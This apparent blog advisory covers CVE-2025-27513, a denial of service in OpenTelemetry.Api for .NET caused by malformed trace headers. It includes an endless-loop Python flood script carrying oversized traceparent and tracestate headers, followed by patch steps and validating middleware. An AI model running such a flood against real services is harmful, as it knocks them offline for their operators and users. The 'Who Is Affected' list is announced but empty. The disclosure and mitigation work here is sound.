CVE-2025-27513 - Denial of Service in OpenTelemetry .NET via Malicious Trace Headers

OpenTelemetry has become a vital tool for monitoring and tracing distributed systems. When a vulnerability appears in such a widely used observability framework, the blast radius is correspondingly large. CVE-2025-27513 was recently disclosed in the OpenTelemetry.Api package for .NET, affecting versions 1.10.0 through 1.11.1. If you run any .NET web application or backend with OpenTelemetry, or merely have the package installed as a transitive dependency, read on.

What is the Vulnerability?

Simply put, if your application processes HTTP requests, it may be exposed to a Denial of Service (DoS) attack even if it never uses OpenTelemetry trace propagation itself. The attack consists of sending specially crafted traceparent and tracestate headers to the application. The way vulnerable versions of OpenTelemetry.Api parsed and handled these headers led to excessive CPU usage, potentially grinding the whole application to a halt.

Sources

- GitHub Security Advisory - OpenTelemetry .NET
- NVD: CVE-2025-27513

Who Is Affected?

Any .NET application that references OpenTelemetry.Api version 1.10.0 to 1.11.1 and listens for HTTP requests — *even if it doesn’t explicitly use trace propagation* — is at risk. This includes:

Exploiting the Bug: How the Attack Works

The attack requires no special skill. By sending requests with *malformed* or excessively long tracestate and traceparent headers, an attacker can trigger CPU-intensive parsing routines in the vulnerable package. The result is increased latency, degraded throughput, and possibly full application downtime. No authentication is needed: the headers are read before any application logic runs.

Here's a simplified Python script using requests to repeatedly target a .NET application:

import requests

# Target application (hypothetical hostname used for illustration)
url = "http://victim-app.local/api/resource"

headers = {
    # Deliberately malformed: the trace-id has 30 hex digits and the parent-id 15,
    # shorter than the 32 and 16 the W3C Trace Context format requires
    "traceparent": "00-4bf92f3577b34da6a3ce929dee4736-00f067aaba902b7-01",
    # Oversized tracestate: 100,000 list members, far beyond the 32 the spec allows
    "tracestate": ",".join(["a=longvaluedata"] * 100000),
}

while True:
    try:
        response = requests.get(url, headers=headers, timeout=10)
        print(f"Status: {response.status_code}")
    except requests.RequestException as exc:
        # A timeout or dropped connection is itself a sign the server is struggling
        print(f"Request failed: {exc}")

This floods the server with requests, each carrying a malformed traceparent and a very large tracestate header. In vulnerable versions the API package did not bail out of parsing early on such input, so every request burned a disproportionate amount of CPU.

How to Fix

Patch immediately: upgrade your OpenTelemetry.Api dependency to version 1.11.2 or later. Check transitive references too (dotnet list package --include-transitive), since the package is pulled in by the OpenTelemetry SDK and instrumentation libraries.

In your .csproj:

<ItemGroup>
    <PackageReference Include="OpenTelemetry.Api" Version="1.11.2" />
</ItemGroup>

Or via the .NET CLI:

dotnet add package OpenTelemetry.Api --version 1.11.2

If you cannot patch immediately:

1. Filter or Remove Trust for Trace Headers: Use middleware to strip incoming traceparent and tracestate headers, like this:

app.Use(async (context, next) =>
{
    // Drop inbound W3C trace-context headers so nothing later in the pipeline parses them
    context.Request.Headers.Remove("traceparent");
    context.Request.Headers.Remove("tracestate");
    await next();
});

Note that ASP.NET Core's hosting layer raises the request-start diagnostic event, where the ASP.NET Core instrumentation reads these headers, before any middleware runs. Stripping in middleware therefore protects only code that extracts propagation context later in the pipeline. To cover the instrumentation path as well, strip or validate the headers at the reverse proxy or load balancer in front of the application.
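A stricter alternative to blanket stripping is to validate the headers against the W3C Trace Context grammar and reject anything that does not conform, so legitimate callers keep end-to-end tracing while malformed or oversized input never reaches a parser. The following is an added example written for this post, not code from the original article or from the OpenTelemetry project; the class and method names (TraceContextGuard, UseTraceContextGuard) are ours, and the limits come from the W3C specification. The same hosting-layer caveat applies: register it first, and pair it with filtering at the edge.

```csharp
// Added example (not from the original post or the OpenTelemetry project):
// strict W3C Trace Context validation for ASP.NET Core. Malformed or oversized
// traceparent/tracestate headers are rejected with HTTP 400; well-formed ones pass.
using System;
using System.Text.RegularExpressions;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Http;
using Microsoft.Extensions.Primitives;

public static class TraceContextGuard
{
    // traceparent: "00-" + 32 lowercase hex (trace-id) + "-" + 16 hex (parent-id) + "-" + 2 hex (flags)
    private static readonly Regex TraceparentRx =
        new(@"^00-[0-9a-f]{32}-[0-9a-f]{16}-[0-9a-f]{2}$", RegexOptions.Compiled);

    // tracestate list-member is key=value. Key: lowercase alnum plus _ - * / with an
    // optional @vendor suffix. Value: printable ASCII without ',' or '=' and no trailing
    // space. Both halves are capped at 256 characters by the spec.
    private static readonly Regex TracestateKeyRx =
        new(@"^[a-z0-9][a-z0-9_\-*/]{0,255}(@[a-z][a-z0-9_\-*/]{0,13})?$", RegexOptions.Compiled);
    private static readonly Regex TracestateValueRx =
        new(@"^[\x20-\x2b\x2d-\x3c\x3e-\x7e]{0,255}[\x21-\x2b\x2d-\x3c\x3e-\x7e]$", RegexOptions.Compiled);

    private const int TraceparentLength = 55;      // the format is fixed-length
    private const int MaxTracestateMembers = 32;   // spec: at most 32 list-members
    // Upper bound on a conforming header: 32 members of "key=value," with 256-char halves.
    private const int MaxTracestateLength = MaxTracestateMembers * (256 + 1 + 256 + 1);

    public static bool IsValidTraceparent(string? value)
    {
        if (value is null || value.Length != TraceparentLength) return false;
        if (!TraceparentRx.IsMatch(value)) return false;
        // An all-zero trace-id or parent-id is invalid per the spec.
        bool traceIdNonZero = !value.AsSpan(3, 32).Trim('0').IsEmpty;
        bool parentIdNonZero = !value.AsSpan(36, 16).Trim('0').IsEmpty;
        return traceIdNonZero && parentIdNonZero;
    }

    public static bool IsValidTracestate(string? value)
    {
        if (value is null) return false;
        // Cheap length gate before any splitting: a 100k-entry header never reaches the loop.
        if (value.Length > MaxTracestateLength) return false;
        string[] members = value.Split(',');
        if (members.Length > MaxTracestateMembers) return false;
        foreach (string raw in members)
        {
            string member = raw.Trim();
            if (member.Length == 0) continue;               // empty members are permitted
            int eq = member.IndexOf('=');
            if (eq <= 0 || eq == member.Length - 1) return false;
            string key = member.Substring(0, eq);
            string val = member.Substring(eq + 1);
            if (key.Length > 256 || val.Length > 256) return false;
            if (!TracestateKeyRx.IsMatch(key) || !TracestateValueRx.IsMatch(val)) return false;
        }
        return true;
    }

    // Register as the first middleware in Program.cs:  app.UseTraceContextGuard();
    public static IApplicationBuilder UseTraceContextGuard(this IApplicationBuilder app) =>
        app.Use(async (HttpContext ctx, Func<Task> next) =>
        {
            IHeaderDictionary h = ctx.Request.Headers;
            // A missing traceparent is fine (no parent context); a present one must be
            // a single, well-formed value.
            bool badParent = h.TryGetValue("traceparent", out StringValues tp)
                             && (tp.Count != 1 || !IsValidTraceparent(tp[0]));
            // tracestate may legitimately be split across several header fields;
            // each must conform, and none is meaningful without a valid traceparent.
            bool badState = false;
            if (h.TryGetValue("tracestate", out StringValues ts))
            {
                badState = badParent;
                foreach (string? field in ts)
                    badState |= !IsValidTracestate(field);
            }
            if (badParent || badState)
            {
                ctx.Response.StatusCode = StatusCodes.Status400BadRequest;
                await ctx.Response.WriteAsync("invalid W3C trace-context header");
                return;
            }
            await next();
        });
}
```

Run against the headers from the attack script above, the traceparent fails the fixed-length check (it is 52 characters, not 55) and the tracestate fails the length gate before a single member is examined, so both are rejected in constant time. A well-formed pair such as 00-4bf92f3577b34da6a3ce929d0e0e4736-00f067aa0ba902b7-01 with tracestate congo=t61rcWkgMzE passes and tracing continues to work.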

Conclusion

Do not ignore CVE-2025-27513. Even if you don't think you use trace propagation, simply having a vulnerable OpenTelemetry.Api package on the request path puts your applications at risk. Update your dependencies, review the headers your applications accept from untrusted clients, and stay alert to future advisories.

Further Reading

- OpenTelemetry .NET Releases
- CVE Details for CVE-2025-27513

Timeline

Published on: 03/05/2025 19:15:39 UTC